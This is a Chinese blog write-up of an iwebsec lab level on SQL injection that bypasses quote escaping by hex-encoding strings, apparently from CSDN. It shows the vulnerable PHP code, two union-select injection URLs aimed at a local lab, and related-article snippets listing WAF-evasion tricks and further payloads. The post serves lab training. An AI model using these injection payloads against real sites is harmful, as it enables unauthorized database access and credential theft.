iwebsec sql-十六进制编码绕过

最新推荐文章于 2024-09-23 15:08:14 发布
最新推荐文章于 2024-09-23 15:08:14 发布
阅读量250 收藏
点赞数 3
文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Enrich_Life/article/details/134521676
版权

11-十六进制编码绕过

打开如下:

在这里插入图片描述

代码分析:

<?php
  if(isset($_GET['id'])){
	if (!get_magic_quotes_gpc()) {
		$id = addslashes($_GET['id']);
		$sql="SELECT * FROM user WHERE id=$id LIMIT 0,1";
		$result=mysql_query($sql);
	}else{
		$id =$_GET['id'];
		$sql="SELECT * FROM user WHERE id=$id LIMIT 0,1";
		$result=mysql_query($sql);
	}
  }else{
		exit();
	}
	if ($result) {
		?>
		<table class='table table-striped'>
      <tr><th>id</th><th>name</th><th>age</th></tr>
		<?php
		while ($row = mysql_fetch_assoc($result)) {
			echo "<tr>";
    			echo "<td>".$row['id']."</td>";
    			echo "<td>".$row['username']."</td>";
    			echo "<td>".$row['password']."</td>";
			echo "</tr>";
		}
		echo "</table>";
	}
	else
	{
//	echo '<font color= "#FFFFFF">';
	print_r(mysql_error());
//	echo "</font>";
	}

?>

get_magic_quotes_gpc 函数用于检测 magic_quotes_gpc 是否开启

addslashes 函数转义字符 '"\nul ,已经可以处理掉大部分的注入攻击

这题是整数型注入,所以还是能进行绕过的

构造注入语句:

#第一种
http://localhost:8050/sqli/11.php?id=1 union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=database())%23

#第二种
http://localhost:8050/sqli/11.php?id=1 union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=0x69776562736563)%23 #获取全部表名

由于会自动转义 ' 所以构造语句时要用函数代替值或用16进制编码

正在努力…
关注
SQL注入&WAF绕过姿势
4ct10n
03-02 2万+
# 1.WAF过滤机制: 1.异常检测协议–拒绝不符合HTTP标准的请求; 2.增强的输入验证–代理和服务端的验证而不只是限于客户端验证; 3.白名单&黑名单机制–白名单适用于稳定的Web应用,黑名单适合处理已知问题; 4.基于规则和基于异常的保护–基于规则更多的依赖黑名单机制基于,基于异常根据系统异常更为灵活; 5.另外还有会话保护、Cookies保护、抗入侵规避技术、响应监视和信息泄
mysql 16进制 绕过_注入绕过技巧
weixin_39846361的博客
01-20 3233
1.绕过空格(注释符/* */,%a0):两个空格代替一个空格,用Tab代替空格,%a0=空格:%20%09%0a %0b %0c %0d %a0/**/最基本的绕过方法,用注释替换空格:/*注释*/2.括号绕过空格:如果空格被过滤,括号没有被过滤,可以用括号绕过。在MySQL中,括号是用来包围子查询的。因此,任何可以计算出结果的语句,都可以用括号包围起来。而括号的两端,可以没有多余的空格。例如:...
mysql 16进制 绕过_sql注入绕过
weixin_39783633的博客
02-01 906
1.空格过滤绕过可用/**/制表符(url编码为%09)换行符(%0a)括号反引号 代替空格mysql数据库有一个特性。在条件语句中,在 where id =1 后面加上 “=1”,成为where id =1 =1 ,就是对前面所有结果&1,查询的结果与原来一样。where id =1 =0 就是对于前面所有结果&0 ,查询的结果为除去原有查询结果的其他数据,输出的是除去1以外的...
基于flask常见trick——unicode&进制编码绕过
最新发布
2401_83799022的博客
09-23 935
其出题方便,经常能在CTF比赛中见到,常见题型有debug模式算pin码、ssti、原型链污染等,其中后两者属于通用漏洞,且在flask框架下有比较成体系的利用方式。而json.loads频繁出现在前后端交互中,如果后端的waf在json.loads之前就对流量监测,则存在unicode编码bypass的空间。而init被blacklist过滤了,幸运的是check是在json.loads之前执行的,可以用unicode编码绕过。并且flag.html不是正常的渲染格式{},所以也要污染掉模板字符串。
iwebsec靶场 SQL注入漏洞通关笔记11-16进制编码绕过
mooyuan的博客
12-01 2652
打开靶场,url为id=1如下所示SQL注入主要分析几个内容(1)闭合方式是什么?iwebsec的第11关关卡为数字型,无闭合(2)注入类别是什么?这部分是普通的报错型注入(3)是否过滤了关键字?很明显通过源码,iwebsec的11关增加了addslashes和get_magic_quotes_gpc函数,可以使用16进制编码的方式进行绕过
Stage #15深度解析:十六进制编码在XSS绕过中的应用
weixin_43822401的博客
06-07 493
在网络安全领域,跨站脚本攻击(XSS)是一种常见的网络攻击手段。随着Web应用安全防护措施的不断完善,攻击者需要更高级的技术来绕过这些防护。本文将详细介绍如何利用十六进制编码在Stage #15中绕过XSS防护措施。
编码绕过
weixin_30430169的博客
05-03 451
1. 绕过payload :union select 1,2,unhex(hex(table_name)),4,5,6,7,8,9,10,11,12,13,14,15 from information_schema.tables where table_schema='cms' 采用了16进制编码。 转载于:https://www.cnblogs.com/pangya/p/89...
SQL十六进制和字符串之间的转换
Z18556896885的博客
05-12 3353
Java中的转换非常简单便捷,但有时候需要在后台实现转换,这里我包装成函数。Mark一下 –字符串转十六进制 CREATE FUNCTION dbo.StrToHex(@str varchar(100)) RETURNS varchar(800) AS BEGIN DECLARE @i INT,@Asi INT,@ModS INT,@res VARCHAR(800),@Len INT,@Cres VARCHAR(4),@tempstr VARBINARY(400) SELECT @i = 1,@res=’’
javascript实现的字符串与十六进制表示字符串相互转换方法
12-30
之所以写这个,是因为发现SQL注入和XSS中经常利用十六进制表示的字符串,比如 SELECT CONCAT(0x68656c6c6f); 得到的是hello <!DOCTYPE html> <html> <head> <title>Hex-Char Bi-Converter&...
SQL Server中,在“整型数字”和“字符串表示的十六进制数字”之间进行转换的函数
10-29
这些转换在多种场景下都很有用,例如在处理二进制数据、编码解码、数据库存储和检索,或者在进行数据清洗和分析时。特别是在与硬件接口交互,比如设备通信,十六进制和整型的转换是必不可少的步骤。 5. **安全性和...
Excel 2010 SQL应用056 将编码转换为十六进制
复行数十步
12-28 371
目录 源数据表 解决方案 HEX函数转换为十六进制的使用 源数据表 序号 汉字 UniCode码 1 〇 12295 2 吖 21526 3 阿 38463 4 啊 21834 5 锕 38165 6 錒 37650 7 嗄 21956 8 厑 21393 9 哎 21710 10 哀 21696 11 唉 21
CTF学习笔记13:iwebsec-SQL注入漏洞-11-十六进制绕过
lvx++的博客
01-23 1536
一、本题难道名不符实,用第1题数字型payload直接打出结果 二、原来是payload中没有单引号,实际做题过程要一步步分析,那么来看看取列名这一步会怎样 (一)果然报错: (二)原因如下: (三)用users的十六制代替 ?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 ...
limit 后注入_SQL注入中的WAF绕过技术
weixin_39932838的博客
11-26 220
1.大小写绕过这个大家都很熟悉,对于一些太垃圾的WAF效果显著,比如拦截了union,那就使用Union UnIoN等等绕过。2.简单编码绕过比如WAF检测关键字,那么我们让他检测不到就可以了。比如检测union,那么我们就用%55也就是U的16进制编码来代替U,union写成 %55nION,结合大小写也可以绕过一些WAF,你可以随意替换一个或几个都可以。也还有大家在Mysql注入中比如表名或是...
sql注入绕过技巧
weixin_43952190的博客
09-22 244
绕过空格 /**/ ,/!/ #注释符 %20 %09 %0a %0b %0c %0d %a0 %00 双空格,tab代替空格 利用括号: select(user())from dual where(1=1)and(2=2) id=1%27and(sleep(ascii(mid(database()from(1)for(1)))=109))%23 引号绕过...
SQL注入绕过技巧
misiwole的博客
01-21 8648
转载自:https://blog.csdn.net/weixin_44940180/article/details/107717511 基本绕过方法 1.大小写 2.双写 3.编码,如URLEncode编码,ASCII编码绕过 4.内敛注释 空格绕过 1.用注释替换空格 select//user,password//from /**/users; 2.空格url编码%20 3.两个空格代替一个空格 4.用Tab代替空格 5.%a0=空格 6.如果空格被过滤,括号没有被过滤,可以用括号绕过 select(u
黑客常用SQL注入绕过技术总结!(冰河吐血整理
q16974058的博客
04-08 1266
引领完成Docker的安装、部署、管理和扩展,让其经历从测试到生产的整个开发生命周期,深入了解Docker适用于什么场景。并且这本Docker的学习权威指南介绍了其组件的基础知识,然后用Docker构建容器和服务来完成各种任务:利用Docker为新项目建立测试环境,演示如何使用持续集成的工作流集成Docker,如何构建应用程序服务和平台,如何使用Docker的API,如何扩展Docker。
hive sql 十六进制赚十进制
06-03
在Hive SQL中,可以使用CONV函数将十六进制数转换为十进制数。例如,如果你想要将十六进制数'1F'转换为十进制数,可以这样写: ``` SELECT CONV('1F', 16, 10); ``` 这将返回31,因为十六进制数'1F'等于十进制数31...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值